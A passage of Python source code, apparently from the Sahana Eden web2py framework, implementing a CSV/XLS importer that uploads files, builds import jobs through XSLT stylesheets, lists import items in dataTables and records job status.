            This will display the upload form
            It will ask for a file to be uploaded or for a job to be selected.

            If a file is uploaded then it will guess at the file type and
            ask for the transform file to be used. The transform files will
            be in a dataTable with the module specific files shown first and
            after those all other known transform files. Once the transform
            file is selected the import process can be started which will
            generate an importJob, and a "POST" method will occur

            If a job is selected it will have two actions, open and delete.
            Open will mean that a "GET" method will occur, with the job details
            passed in.
            Whilst the delete action will trigger a "DELETE" method.
        """

        _debug("S3Importer.upload()")

        request = self.request

        form = self._upload_form(r, **attr)
        output = self._create_upload_dataTable()
        if request.representation == "aadata":
            return output

        output.update(form=form, title=self.uploadTitle)
        return output

    # -------------------------------------------------------------------------
    def generate_job(self, r, **attr):
        """
            Generate an ImportJob from the submitted upload form
        """

        _debug("S3Importer.display()")

        response = current.response
        s3 = response.s3

        db = current.db
        table = self.upload_table

        title=self.uploadTitle
        form = self._upload_form(r, **attr)

        r = self.request
        r.read_body()
        sfilename = form.vars.file
        try:
            ofilename = r.post_vars["file"].filename
        except:
            form.errors.file = self.messages.no_file

        if form.errors:
            response.flash = ""
            output = self._create_upload_dataTable()
            output.update(form=form, title=title)

        elif not sfilename or \
             ofilename not in r.files or r.files[ofilename] is None:
            response.flash = ""
            response.error = self.messages.file_not_found
            output = self._create_upload_dataTable()
            output.update(form=form, title=title)

        else:
            output = dict()
            query = (table.file == sfilename)
            db(query).update(controller=self.controller,
                             function=self.function,
                             filename=ofilename,
                             user_id=current.session.auth.user.id)
            # must commit here to separate this transaction from
            # the trial import phase which will be rolled back.
            db.commit()

            extension = ofilename.rsplit(".", 1).pop()
            if extension not in ("csv", "xls"):
                response.flash = None
                response.error = self.messages.invalid_file_format
                return self.upload(r, **attr)

            upload_file = r.files[ofilename]
            if extension == "xls":
                if "xls_parser" in s3:
                    upload_file.seek(0)
                    upload_file = s3.xls_parser(upload_file.read())
                    extension = "csv"

            if upload_file is None:
                response.flash = None
                response.error = self.messages.file_not_found
                return self.upload(r, **attr)
            else:
                upload_file.seek(0)

            row = db(query).select(table.id, limitby=(0, 1)).first()
            upload_id = row.id
            if "single_pass" in r.vars:
                single_pass = r.vars["single_pass"]
            else:
                single_pass = None
            self._generate_import_job(upload_id,
                                      upload_file,
                                      extension,
                                      commit_job = single_pass)
            if upload_id is None:
                row = db(query).update(status = 2) # in error
                if self.error != None:
                    response.error = self.error
                if self.warning != None:
                    response.warning = self.warning
                response.flash = ""
                return self.upload(r, **attr)
            else:
                if single_pass:
                    current.session.flash = self.messages.file_uploaded
                    # For a single pass retain the vars from the original URL
                    next_URL = URL(r=self.request,
                                   f=self.function,
                                   args=["import"],
                                   vars=current.request.get_vars
                                  )
                    redirect(next_URL)
                s3.dataTable_vars = {"job" : upload_id}
                return self.display_job(upload_id)
        return output

    # -------------------------------------------------------------------------
    def display_job(self, upload_id):
        """
            @todo: docstring?
        """

        _debug("S3Importer.display_job()")

        request = self.request
        response = current.response

        db = current.db
        table = self.upload_table
        job_id = self.job_id
        output = dict()
        if job_id == None:
            # redirect to the start page (removes all vars)
            query = (table.id == upload_id)
            row = db(query).update(status = 2) # in error
            current.session.warning = self.messages.no_records_to_import
            redirect(URL(r=request, f=self.function, args=["import"]))

        # Get the status of the upload job
        query = (table.id == upload_id)
        row = db(query).select(table.status,
                               table.modified_on,
                               table.summary_added,
                               table.summary_error,
                               table.summary_ignored,
                               limitby=(0, 1)).first()
        status = row.status
        # completed display details
        if status == 3: # Completed
            # @todo currently this is an unnecessary server call,
            #       change for completed records to be a display details
            #       and thus avoid the round trip.
            #       but keep this code to protect against hand-crafted URLs
            #       (and the 'go back' syndrome on the browser)
            result = (row.summary_added,
                      row.summary_error,
                      row.summary_ignored,
                     )
            self._display_completed_job(result, row.modified_on)
            redirect(URL(r=request, f=self.function, args=["import"]))
        # otherwise display import items
        response.view = self._view(request, "list.html")

        output = self._create_import_item_dataTable(upload_id, job_id)
        if request.representation == "aadata":
            return output

        if response.s3.error_report:
            error_report = "Errors|" + "|".join(response.s3.error_report)
            error_tip = A("All Errors",
                          _class="errortip",
                          _title=error_report)
        else:
            # @todo: restore the error tree from all items?
            error_tip = ""

        rowcount = len(self._get_all_items(upload_id))
        rheader = DIV(TABLE(
            TR(
                TH("%s: " % self.messages.job_total_records),
                TD(rowcount, _id="totalAvaliable"),
                TH("%s: " % self.messages.job_records_selected),
                TD(0, _id="totalSelected"),
                TH(error_tip)
              ),
        ))

        output["title"] = self.messages.title_job_read
        output["rheader"] = rheader
        output["subtitle"] = self.messages.title_job_list

        return output

    # -------------------------------------------------------------------------
    def commit(self, source, transform):
        """
            @todo: docstring?
        """

        _debug("S3Importer.commit(%s, %s)" % (source, transform))

        db = current.db
        session = current.session
        request = self.request

        try:
            openFile = open(source, "r")
        except:
            session.error = self.messages.file_open_error % source
            redirect(URL(r=request, f=self.function))

        # @todo: manage different file formats
        # @todo: find file format from request.extension
        fileFormat = "csv"

        # insert data in the table and get the ID
        try:
            user = session.auth.user.id
        except:
            user = None

        upload_id = self.upload_table.insert(controller=self.controller,
                                             function=self.function,
                                             filename = source,
                                             user_id = user,
                                             status = 1)
        db.commit()

        # create the import job
        result = self._generate_import_job(upload_id,
                                           openFile,
                                           fileFormat,
                                           stylesheet=transform
                                          )
        if result == None:
            if self.error != None:
                if session.error == None:
                    session.error = self.error
                else:
                    session.error += self.error
            if self.warning != None:
                if session.warning == None:
                    session.warning = self.warning
                else:
                    session.warning += self.warning
        else:
            items = self._get_all_items(upload_id, True)
            # commit the import job
            self._commit_import_job(upload_id, items)
            result = self._update_upload_job(upload_id)

            # get the results and display
            msg = "%s : %s %s %s" % (source,
                                     self.messages.commit_total_records_imported,
                                     self.messages.commit_total_errors,
                                     self.messages.commit_total_records_ignored)
            msg = msg % result

            if session.flash == None:
                session.flash = msg
            else:
                session.flash += msg

        # @todo: return the upload_id?

    # -------------------------------------------------------------------------
    def commit_items(self, upload_id, items):
        """
            @todo: docstring?
        """

        _debug("S3Importer.commit_items(%s, %s)" % (upload_id, items))
        # Save the import items
        self._commit_import_job(upload_id, items)
        # Update the upload table
        # change the status to completed
        # record the summary details
        # delete the upload file
        result = self._update_upload_job(upload_id)
        # redirect to the start page (removes all vars)
        self._display_completed_job(result)
        redirect(URL(r=self.request, f=self.function, args=["import"]))

    # -------------------------------------------------------------------------
    def delete_job(self, upload_id):
        """
            Delete an uploaded file and the corresponding import job

            @param upload_id: the upload ID
        """

        _debug("S3Importer.delete_job(%s)" % (upload_id))

        db = current.db

        request = self.request
        resource = request.resource # use self.resource?
        response = current.response

        # Get the import job ID
        job_id = self.job_id

        # Delete the import job (if any)
        if job_id:
            result = resource.import_xml(None,
                                         id = None,
                                         tree = None,
                                         job_id = job_id,
                                         delete_job = True)
        # @todo: check result

        # now delete the upload entry
        query = (self.upload_table.id == upload_id)
        count = db(query).delete()
        # @todo: check that the record has been deleted

        # Now commit the changes
        db.commit()

        result = count

        # return to the main import screen
        # @todo: check result properly
        if result == False:
            response.warning = self.messages.no_job_to_delete
        else:
            response.flash = self.messages.job_deleted

        # redirect to the start page (remove all vars)
        self.next = self.request.url(vars=dict())
        return

    # ========================================================================
    # Utility methods
    # ========================================================================
    def _upload_form(self, r, **attr):
        """
            Create and process the upload form, including csv_extra_fields
        """

        EXTRA_FIELDS = "csv_extra_fields"
        TEMPLATE = "csv_template"
        REPLACE_OPTION = "replace_option"

        session = current.session
        response = current.response
        s3 = response.s3
        request = self.request
        table = self.upload_table

        formstyle = s3.crud.formstyle
        response.view = self._view(request, "list_create.html")

        if REPLACE_OPTION in attr:
            replace_option = attr[REPLACE_OPTION]
            if replace_option is not None:
                table.replace_option.readable = True
                table.replace_option.writable = True
                table.replace_option.label = replace_option

        fields = [f for f in table if f.readable or f.writable and not f.compute]
        if EXTRA_FIELDS in attr:
            extra_fields = attr[EXTRA_FIELDS]
            if extra_fields is not None:
                fields.extend([f["field"] for f in extra_fields if "field" in f])
            self.csv_extra_fields = extra_fields
        labels, required = s3_mark_required(fields)
        if required:
            s3.has_required = True

        form = SQLFORM.factory(table_name=self.UPLOAD_TABLE_NAME,
                               labels=labels,
                               formstyle=formstyle,
                               upload = os.path.join(request.folder, "uploads", "imports"),
                               separator = "",
                               message=self.messages.file_uploaded,
                               *fields)

        args = ["s3csv"]
        template = attr.get(TEMPLATE, True)
        if template is True:
            args.extend([self.controller, "%s.csv" % self.function])
        elif isinstance(template, basestring):
            args.extend([self.controller, "%s.csv" % template])
        elif isinstance(template, (tuple, list)):
            args.extend(template[:-1])
            args.append("%s.csv" % template[-1])
        else:
            template = None
        if template is not None:
            url = URL(r=request, c="static", f="formats", args=args)
            try:
                # only add the download link if the template can be opened
                open("%s/../%s" % (r.folder, url))
                form[0][0].insert(0, TR(TD(A(self.messages.download_template,
                                             _href=url)),
                                        _id="template__row"))
            except:
                pass

        if form.accepts(r.post_vars, session,
                        formname="upload_form"):
            upload_id = table.insert(**table._filter_fields(form.vars))
            if self.csv_extra_fields:
                self.csv_extra_data = Storage()
                for f in self.csv_extra_fields:
                    label = f.get("label", None)
                    if not label:
                        continue
                    field = f.get("field", None)
                    value = f.get("value", None)
                    if field:
                        if field.name in form.vars:
                            data = form.vars[field.name]
                        else:
                            data = field.default
                        value = data
                        requires = field.requires
                        if not isinstance(requires, (list, tuple)):
                            requires = [requires]
                        if requires:
                            requires = requires[0]
                            if isinstance(requires, IS_EMPTY_OR):
                                requires = requires.other
                            try:
                                options = requires.options()
                            except:
                                pass
                            else:
                                for k, v in options:
                                    if k == str(data):
                                        value = v
                    elif value is None:
                        continue
                    self.csv_extra_data[label] = value
        s3.no_formats = True
        return form

    # -------------------------------------------------------------------------
    def _create_upload_dataTable(self):
        """
            List of previous Import jobs
        """

        db = current.db
        request = self.request
        controller = self.controller
        function = self.function
        s3 = current.response.s3

        table = self.upload_table
        s3.filter = (table.controller == controller) & \
                    (table.function == function)
        fields = ["id",
                  "filename",
                  "created_on",
                  "user_id",
                  "replace_option",
                  "status"]

        self._use_upload_table()

        # Hide the list of prior uploads for now
        #output = self._dataTable(fields, sort_by = [[2,"desc"]])
        output = dict()

        self._use_controller_table()

        if request.representation == "aadata":
            return output

        query = (table.status != 3) # Status of Pending or in-Error
        rows = db(query).select(table.id)
        restrictOpen = [str(row.id) for row in rows]
        query = (table.status == 3) # Status of Completed
        rows = db(query).select(table.id)
        restrictView = [str(row.id) for row in rows]

        s3.actions = [
                    dict(label=str(self.messages.open_btn),
                         _class="action-btn",
                         url=URL(r=request,
                                 c=controller,
                                 f=function,
                                 args=["import"],
                                 vars={"job":"[id]"}),
                         restrict = restrictOpen

                         ),
                    dict(label=str(self.messages.view_btn),
                         _class="action-btn",
                         url=URL(r=request,
                                 c=controller,
                                 f=function,
                                 args=["import"],
                                 vars={"job":"[id]"}),
                         restrict = restrictView
                         ),
                    dict(label=str(self.messages.delete_btn),
                         _class="delete-btn",
                         url=URL(r=request,
                                 c=controller,
                                 f=function,
                                 args=["import"],
                                 vars={"job":"[id]",
                                       "delete":"True"
                                      }
                                )
                         ),
                  ]
        # Display an Error if no job is attached with this record
        query = (table.status == 1) # Pending
        rows = db(query).select(table.id)
        s3.dataTableStyleAlert = [str(row.id) for row in rows]
        query = (table.status == 2) # in error
        rows = db(query).select(table.id)
        s3.dataTableStyleWarning = [str(row.id) for row in rows]

        return output

    # -------------------------------------------------------------------------
    def _create_import_item_dataTable(self, upload_id, job_id):
        """
            @todo: docstring?
        """

        s3 = current.response.s3

        represent = {"element" : self._item_element_represent}
        self._use_import_item_table(job_id)

        # Add a filter to the dataTable query
        s3.filter = (self.table.job_id == job_id) & \
                    (self.table.tablename == self.controller_tablename)

        # Get a list of the records that have an error of None
        query =  (self.table.job_id == job_id) & \
                 (self.table.tablename == self.controller_tablename)
        rows = current.db(query).select(self.table.id, self.table.error)
        select_list = []
        error_list = []
        for row in rows:
            if row.error:
                error_list.append(str(row.id))
            else:
                select_list.append("%s" % row.id)
        select_id = ",".join(select_list)

        output = self._dataTable(["id", "element", "error"],
                                 sort_by = [[1, "asc"]],
                                 represent=represent)

        self._use_controller_table()

        if self.request.representation == "aadata":
            return output

        # Highlight rows in error in red
        s3.dataTableStyleWarning = error_list

        s3.dataTableSelectable = True
        s3.dataTablePostMethod = True
        table = output["items"]
        job = INPUT(_type="hidden", _id="importUploadID", _name="job",
                    _value="%s" % upload_id)
        mode = INPUT(_type="hidden", _id="importMode", _name="mode",
                     _value="Inclusive")
        # only select the rows with no errors
        selected = INPUT(_type="hidden", _id="importSelected",
                         _name="selected", _value="[%s]" % select_id)
        form = FORM(table, job, mode, selected)
        output["items"] = form
        s3.dataTableSelectSubmitURL = "import?job=%s&" % upload_id
        s3.actions = [
                        dict(label= str(self.messages.item_show_details),
                             _class="action-btn",
                             _jqclick="$('.importItem.'+id).toggle();",
                             ),
                      ]
        return output

    # -------------------------------------------------------------------------
    def _generate_import_job(self,
                             upload_id,
                             openFile,
                             fileFormat,
                             stylesheet=None,
                             commit_job=False):
        """
            This will take a s3_import_upload record and
            generate the importJob

            @param uploadFilename: The name of the uploaded file

            @todo: complete parameter descriptions
        """

        _debug("S3Importer._generate_import_job(%s, %s, %s, %s)" % (upload_id,
                                                                openFile,
                                                                fileFormat,
                                                                stylesheet
                                                               )
              )

        db = current.db
        request = self.request
        resource = request.resource

        # ---------------------------------------------------------------------
        # CSV
        if fileFormat == "csv" or fileFormat == "comma-separated-values":

            fmt = "csv"
            src = openFile

        # ---------------------------------------------------------------------
        # XML
        # @todo: implement
        #elif fileFormat == "xml":

        # ---------------------------------------------------------------------
        # S3JSON
        # @todo: implement
        #elif fileFormat == "s3json":

        # ---------------------------------------------------------------------
        # PDF
        # @todo: implement
        #elif fileFormat == "pdf":

        # ---------------------------------------------------------------------
        # Unsupported Format
        else:
            msg = self.messages.unsupported_file_type % fileFormat
            self.error = msg
            _debug(msg)
            return None

        # Get the stylesheet
        if stylesheet == None:
            stylesheet = self._get_stylesheet()
        if stylesheet == None:
            return None

        # before calling import tree ensure the db.table is the controller_table
        self.table = self.controller_table
        self.tablename = self.controller_tablename

        # Pass stylesheet arguments
        args = Storage()
        mode = request.get_vars.get("xsltmode", None)
        if mode is not None:
            args.update(mode=mode)

        # Generate the import job
        resource.import_xml(src,
                            format=fmt,
                            extra_data=self.csv_extra_data,
                            stylesheet=stylesheet,
                            ignore_errors = True,
                            commit_job = commit_job,
                            **args)

        job = resource.job
        if job is None:
            if resource.error:
                # Error
                self.error = resource.error
                return None
            else:
                # Nothing to import
                self.warning = self.messages.no_records_to_import
                return None
        else:
            # Job created
            job_id = job.job_id
            errors = current.xml.collect_errors(job)
            if errors:
                current.response.s3.error_report = errors
            query = (self.upload_table.id == upload_id)
            result = db(query).update(job_id=job_id)
            # @todo: add check that result == 1, if not we are in error
            # Now commit the changes
            db.commit()

        self.job_id = job_id
        return True

    # -------------------------------------------------------------------------
    def _get_stylesheet(self, file_format="csv"):
        """
            Get the stylesheet for transformation of the import

            @param file_format: the import source file format
        """

        if file_format == "csv":
            xslt_path = os.path.join(self.xslt_path, "s3csv")
        else:
            xslt_path = os.path.join(self.xslt_path, file_format, "import.xsl")
            return xslt_path

        # Use the "csv_stylesheet" parameter to override the CSV stylesheet subpath
        # and filename, e.g.
        #       s3_rest_controller(module, resourcename,
        #                          csv_stylesheet=("inv", "inv_item.xsl"))
        if self.csv_stylesheet:
            if isinstance(self.csv_stylesheet, (tuple, list)):
                stylesheet = os.path.join(xslt_path,
                                          *self.csv_stylesheet)
            else:
                stylesheet = os.path.join(xslt_path,
                                          self.controller,
                                          self.csv_stylesheet)
        else:
            xslt_filename = "%s.%s" % (self.function, self.xslt_extension)
            stylesheet = os.path.join(xslt_path,
                                      self.controller,
                                      xslt_filename)

        if os.path.exists(stylesheet) is False:
            msg = self.messages.stylesheet_not_found % stylesheet
            self.error = msg
            _debug(msg)
            return None

        return stylesheet

    # -------------------------------------------------------------------------
    def _commit_import_job(self, upload_id, items):
        """
            This will save all of the selected import items

            @todo: parameter descriptions?
        """

        _debug("S3Importer._commit_import_job(%s, %s)" % (upload_id, items))

        db = current.db
        resource = self.request.resource

        # Load the items from the s3_import_item table
        self.importDetails = dict()

        table = self.upload_table
        query = (table.id == upload_id)
        row = db(query).select(table.job_id,
                               table.replace_option,
                               limitby=(0, 1)).first()
        if row is None:
            return False
        else:
            job_id = row.job_id
            current.response.s3.import_replace = row.replace_option

        itemTable = S3ImportJob.define_item_table()

        if itemTable != None:
            #****************************************************************
            # EXPERIMENTAL
            # This doesn't delete related items
            # but import_tree will tidy it up later
            #****************************************************************
            # get all the items selected for import
            rows = self._get_all_items(upload_id, as_string=True)

            # loop through each row and delete the items not required
            self._store_import_details(job_id, "preDelete")
            for id in rows:
                if str(id) not in items:
                    # @todo: replace with a helper method from the API
                    _debug("Deleting item.id = %s" % id)
                    query = (itemTable.id == id)
                    db(query).delete()

            #****************************************************************
            # EXPERIMENTAL
            #****************************************************************

            # set up the table we will import data into
            self.table = self.controller_table
            self.tablename = self.controller_tablename

            self._store_import_details(job_id, "preImportTree")

            # Now commit the remaining items
            msg = resource.import_xml(None,
                                      job_id = job_id,
                                      ignore_errors = True)
            return resource.error is None

    # -------------------------------------------------------------------------
    def _store_import_details(self, job_id, key):
        """
            This will store the details from an importJob

            @todo: parameter descriptions?
        """

        _debug("S3Importer._store_import_details(%s, %s)" % (job_id, key))

        itemTable = S3ImportJob.define_item_table()

        query = (itemTable.job_id == job_id)  & \
                (itemTable.tablename == self.controller_tablename)
        rows = current.db(query).select(itemTable.data, itemTable.error)
        items = [dict(data=row.data, error=row.error) for row in rows]

        self.importDetails[key] = items

    # -------------------------------------------------------------------------
    def _update_upload_job(self, upload_id):
        """
            This will record the results from the import, and change the
            status of the upload job

            @todo: parameter descriptions?
            @todo: report errors in referenced records, too
        """

        _debug("S3Importer._update_upload_job(%s)" % (upload_id))

        request = self.request
        resource = request.resource
        db = current.db

        totalPreDelete = len(self.importDetails["preDelete"])
        totalPreImport = len(self.importDetails["preImportTree"])
        totalIgnored = totalPreDelete - totalPreImport

        if resource.error_tree is None:
            totalErrors = 0
        else:
            totalErrors = len(resource.error_tree.findall(
                            "resource[@name='%s']" % resource.tablename))

        totalRecords = totalPreImport - totalErrors
        if totalRecords < 0:
            totalRecords = 0

        query = (self.upload_table.id == upload_id)
        result = db(query).update(summary_added=totalRecords,
                                  summary_error=totalErrors,
                                  summary_ignored = totalIgnored,
                                  status = 3)

        # Now commit the changes
        db.commit()
        return (totalRecords, totalErrors, totalIgnored)

    # -------------------------------------------------------------------------
    def _display_completed_job(self, totals, timestmp=None):
        """
            Generate a summary flash message for a completed import job

            @param totals: the job totals as tuple
                           (total imported, total errors, total ignored)
            @param timestmp: the timestamp of the completion
        """

        session = current.session

        msg = "%s - %s - %s" % \
              (self.messages.commit_total_records_imported,
               self.messages.commit_total_errors,
               self.messages.commit_total_records_ignored)
        msg = msg % totals

        if timestmp != None:
            session.flash = self.messages.job_completed % \
                            (self.date_represent(timestmp), msg)
        elif totals[1] is not 0:
            session.error = msg
        elif totals[2] is not 0:
            session.warning = msg
        else:
            session.flash = msg

    # -------------------------------------------------------------------------
    def _dataTable(self,
                   list_fields = [],
                   sort_by = [[1, "asc"]],
                   represent={},
                  ):
        """
            Method to get the data for the dataTable
            This can be either a raw html representation or
            and ajax call update
            Additional data will be cached to limit calls back to the server

            @param list_fields: list of field names
            @param sort_by: list of sort by columns
            @param represent: a dict of field callback functions used
                              to change how the data will be displayed

            @return: a dict()
               In html representations this will be a table of the data
               plus the sortby instructions
               In ajax this will be a json response

               In addition the following values will be made available:
               totalRecords         Number of records in the filtered data set
               totalDisplayRecords  Number of records to display
               start                Start point in the ordered data set
               limit                Number of records in the ordered set
               NOTE: limit - totalDisplayRecords = total cached
        """

        # ********************************************************************
        # Common tasks
        # ********************************************************************
        db = current.db
        session = current.session
        request = self.request
        response = current.response
        resource = self.resource
        s3 = response.s3
        representation = request.representation
        table = self.table
        tablename = self.tablename
        vars = request.get_vars
        output = dict()

        # Check permission to read this table
        authorised = self.permit("read", tablename)
        if not authorised:
            request.unauthorised()

        # List of fields to select from
        # fields is a list of Field objects
        # list_field is a string list of field names
        if list_fields == []:
            fields = resource.readable_fields()
        else:
            fields = [table[f] for f in list_fields if f in table.fields]
        if not fields:
            fields = []

        # attach any represent callbacks
        for f in fields:
            if f.name in represent:
                f.represent = represent[f.name]

        # Make sure that we have the table id as the first column
        if fields[0].name != table.fields[0]:
            fields.insert(0, table[table.fields[0]])

        list_fields = [f.name for f in fields]

        # Filter
        if s3.filter is not None:
            self.resource.add_filter(s3.filter)

        # ********************************************************************
        # ajax call
        # ********************************************************************
        if representation == "aadata":
            start = vars.get("iDisplayStart", None)
            limit = vars.get("iDisplayLength", None)
            if limit is not None:
                try:
                    start = int(start)
                    limit = int(limit)
                except ValueError:
                    start = None
                    limit = None # use default
            else:
                start = None # use default
            # Using the sort variables sent from dataTables
            if vars.iSortingCols:
                orderby = self.ssp_orderby(resource, list_fields)

            # Echo
            sEcho = int(vars.sEcho or 0)

            # Get the list
            items = resource.sqltable(fields=list_fields,
                                      start=start,
                                      limit=limit,
                                      orderby=orderby,
                                      download_url=self.download_url,
                                      as_page=True) or []
            # Ugly hack to change any occurrence of [id] with the true id
            # Needed because the represent doesn't know the id
            for i in range(len(items)):
                id = items[i][0]
                for j in range(len(items[i])):
                    new = items[i][j].replace("[id]",id)
                    items[i][j] = new
            totalrows = self.resource.count()
            result = dict(sEcho = sEcho,
                          iTotalRecords = totalrows,
                          iTotalDisplayRecords = totalrows,
                          aaData = items)

            output = jsons(result)

        # ********************************************************************
        # html 'initial' call
        # ********************************************************************
        else: # catch all
            start = 0
            limit = 1
            # Sort by
            vars["iSortingCols"] = len(sort_by)

            # generate the dataTables.js variables for sorting
            index = 0
            for col in sort_by:
                colName = "iSortCol_%s" % str(index)
                colValue = col[0]
                dirnName = "sSortDir_%s" % str(index)
                if len(col) > 1:
                    dirnValue = col[1]
                else:
                    dirnValue = "asc"
                vars[colName] = colValue
                vars[dirnName] = dirnValue
            # Now using these sort variables generate the order by statement
            orderby = self.ssp_orderby(resource, list_fields)

            del vars["iSortingCols"]
            for col in sort_by:
                del vars["iSortCol_%s" % str(index)]
                del vars["sSortDir_%s" % str(index)]

            # Get the first row for a quick up load
            items = resource.sqltable(fields=list_fields,
                                      start=start,
                                      limit=1,
                                      orderby=orderby,
                                      download_url=self.download_url)
            totalrows = resource.count()
            if items:
                if totalrows:
                    if s3.dataTable_iDisplayLength:
                        limit = 2 * s3.dataTable_iDisplayLength
                    else:
                        limit = 50
                # Add a test on the first call here:
                # Now get the limit rows for ajax style update of table
                sqltable = resource.sqltable(fields=list_fields,
                                             start=start,
                                             limit=limit,
                                             orderby=orderby,
                                             download_url=self.download_url,
                                             as_page=True)
                aadata = dict(aaData = sqltable or [])
                # Ugly hack to change any occurrence of [id] with the true id
                # Needed because the represent doesn't know the id
                for i in range(len(aadata["aaData"])):
                    id = aadata["aaData"][i][0]
                    for j in range(len(aadata["aaData"][i])):
                        new = aadata["aaData"][i][j].replace("[id]",id)
                        aadata["aaData"][i][j] = new

                aadata.update(iTotalRecords=totalrows,
                              iTotalDisplayRecords=totalrows)
                response.aadata = jsons(aadata)
                s3.start = 0
                s3.limit = limit
            else: # No items in database
                # s3import tables don't have a delete field but kept for the record
                if "deleted" in table:
                    available_records = db(table.deleted == False)
                else:
                    available_records = db(table.id > 0)
                # check for any records on an unfiltered table
                if available_records.select(table.id,
                                            limitby=(0, 1)).first():
                    items = self.crud_string(tablename, "msg_no_match")
                else:
                    items = self.crud_string(tablename, "msg_list_empty")

            output.update(items=items, sortby=sort_by)
            # Value to be added to the dataTable ajax call
            s3.dataTable_Method = "import"

        return output

    # -------------------------------------------------------------------------
    def _item_element_represent(self, value):
        """
            Represent the element in an import item for dataTable display

            @param value: the string containing the element
        """

        T = current.T
        db = current.db

        value = S3XML.xml_decode(value)
        try:
            element = etree.fromstring(value)
        except:
            # XMLSyntaxError: return the element as-is
            return DIV(value)

        tablename = element.get("name")
        table = current.db[tablename]

        output = DIV()
        details = TABLE(_class="importItem [id]")
        header, rows = self._add_item_details(element.findall("data"), table)
        if header is not None:
            output.append(header)
        # Add components, if present
        components = element.findall("resource")
        for component in components:
            ctablename = component.get("name")
            ctable = db[ctablename]
            self._add_item_details(component.findall("data"), ctable,
                                   details=rows, prefix=True)
        if rows:
            details.append(TBODY(rows))
        # Add error messages, if present
        errors = current.xml.collect_errors(element)
        if errors:
            details.append(TFOOT(TR(TH("%s:" % T("Errors")),
                                   TD(UL([LI(e) for e in errors])))))
        if rows == [] and components == []:
            # At this stage we don't have anything to display to see if we can
            # find something to show. This could be the case when a table being
            # imported is a resolver for a many to many relationship
            refdetail = TABLE(_class="importItem [id]")
            references = element.findall("reference")
            for reference in references:
                tuid = reference.get("tuid")
                resource = reference.get("resource")
                refdetail.append(TR(TD(resource), TD(tuid)))
            output.append(refdetail)
        else:
            output.append(details)
        return str(output)

    # -------------------------------------------------------------------------
    @staticmethod
    def _add_item_details(data, table, details=None, prefix=False):
        """
            Add details of the item element

            @param data: the list of data elements in the item element
            @param table: the table for the data
            @param details: the existing details rows list (to append to)
        """

        tablename = table._tablename
        if details is None:
            details = []
        first = None
        firstString = None
        header = None
        for child in data:
            f = child.get("field", None)
            if f not in table.fields:
                continue
            elif f == "wkt":
                # Skip bulky WKT fields
                continue
            field = table[f]
            ftype = str(field.type)
            value = child.get("value", None)
            if not value:
                value = child.text
            try:
                value = S3Importer._decode_data(field, value)
            except:
                pass
            if value:
                value = S3XML.xml_encode(unicode(value))
            else:
                value = ""
            if f != None and value != None:
                headerText = P(B("%s: " % f), value)
                if not first:
                    first = headerText
                if ftype == "string" and not firstString:
                    firstString = headerText
                if f == "name":
                    header = headerText
                if prefix:
                    details.append(TR(TH("%s.%s:" % (tablename, f)), TD(value)))
                else:
                    details.append(TR(TH("%s:" % f), TD(value)))
        if not header:
            if firstString:
                header = firstString
            else:
                header = first
        return (header, details)

    # -------------------------------------------------------------------------
    @staticmethod
    def _decode_data(field, value):
        """
            Try to decode string data into their original type

            @param field: the Field instance
            @param value: the stringified value

            @todo: replace this by ordinary decoder
        """

        if field.type == "string" or \
            field.type == "string" or  \
            field.type == "password" or \
            field.type == "upload" or \
            field.type == "text":
            return value
        elif field.type == "integer" or field.type == "id":
            return int(value)
        elif field.type == "double" or field.type == "decimal":
            return double(value)
        elif  field.type == 'boolean':
            if value and not str(value)[:1].upper() in ["F", "0"]:
                return "T"
            else:
                return "F"
        elif field.type == "date":
            return value # @todo fix this to get a date
        elif field.type == "time":
            return value # @todo fix this to get a time
        elif field.type == "datetime":
            return value # @todo fix this to get a datetime
        else:
            return value

    # -------------------------------------------------------------------------
    @staticmethod
    def date_represent(date_obj):
        """
            Represent a datetime object as string

            @param date_obj: the datetime object

            @todo: replace by S3DateTime method?
        """
        return date_obj.strftime("%d %B %Y, %I:%M%p")

    # -------------------------------------------------------------------------
    def _process_item_list(self, upload_id, vars):
        """
            Get the list of IDs for the selected items from the "mode"
            and "selected" request variables

            @param upload_id: the upload_id
            @param vars: the request variables
        """

        items = None
        if "mode" in vars:
            mode = vars["mode"]
            if "selected" in vars:
                selected = vars["selected"].split(",")
            else:
                selected = []
            if mode == "Inclusive":
                items = selected
            elif mode == "Exclusive":
                all_items = self._get_all_items(upload_id, as_string=True)
                items = [i for i in all_items if i not in selected]
        return items

    # -------------------------------------------------------------------------
    def _get_all_items(self, upload_id, as_string=False):
        """ Get a list of the record IDs of all import items for
            the the given upload ID

            @param upload_id: the upload ID
            @param as_string: represent each ID as string
        """

        item_table = S3ImportJob.define_item_table()
        upload_table = self.upload_table

        query = (upload_table.id == upload_id) & \
                (item_table.job_id == upload_table.job_id) & \
                (item_table.tablename == self.controller_tablename)

        rows = current.db(query).select(item_table.id)
        if as_string:
            items = [str(row.id) for row in rows]
        else:
            items = [row.id for row in rows]

        return items

    # -------------------------------------------------------------------------
    def _use_upload_table(self):
        """
            Set the resource and the table to being s3_import_upload
        """

        if self.upload_resource == None:
            from s3resource import S3Resource
            (prefix, name) = self.UPLOAD_TABLE_NAME.split("_",1)
            self.upload_resource = S3Resource(prefix, name)
        self.resource = self.upload_resource
        self.table = self.upload_table
        self.tablename = self.upload_tablename

    # -------------------------------------------------------------------------
    def _use_controller_table(self):
        """
            Set the resource and the table to be the imported resource
        """

        self.resource = self.controller_resource
        self.table = self.controller_table
        self.tablename = self.controller_tablename

    # -------------------------------------------------------------------------
    def _use_import_item_table(self, job_id):
        """
            Set the resource and the table to being s3_import_item 
        """

        if self.item_resource == None:
            from s3resource import S3Resource
            (prefix, name) = S3ImportJob.ITEM_TABLE_NAME.split("_",1)
            self.item_resource = S3Resource(prefix, name)
        self.resource = self.item_resource
        self.tablename = S3ImportJob.ITEM_TABLE_NAME
        self.table = S3ImportJob.define_item_table()

    # -------------------------------------------------------------------------
    def __define_table(self):
        """ Configures the upload table """

        _debug("S3Importer.__define_table()")

        T = current.T
        db = current.db
        request = current.request

        self.upload_tablename = self.UPLOAD_TABLE_NAME

        import_upload_status = {
            1: T("Pending"),
            2: T("In error"),
            3: T("Completed"),
        }

        def user_name_represent(id):
            # @todo: use s3_present_user?

            rep_str = "-"
            table = db.auth_user
            query = (table.id == id)
            row = db(query).select(table.first_name,
                                   table.last_name,
                                   limitby=(0, 1)).first()
            if row:
                rep_str = "%s %s" % (row.first_name, row.last_name)
            return rep_str

        def status_represent(index):
            if index == None:
                return "Unknown" # @todo: use messages (internationalize)
            else:
                return import_upload_status[index]

        now = request.utcnow
        table = self.define_upload_table()
        table.file.upload_folder = os.path.join(request.folder,
                                                "uploads",
                                                #"imports"
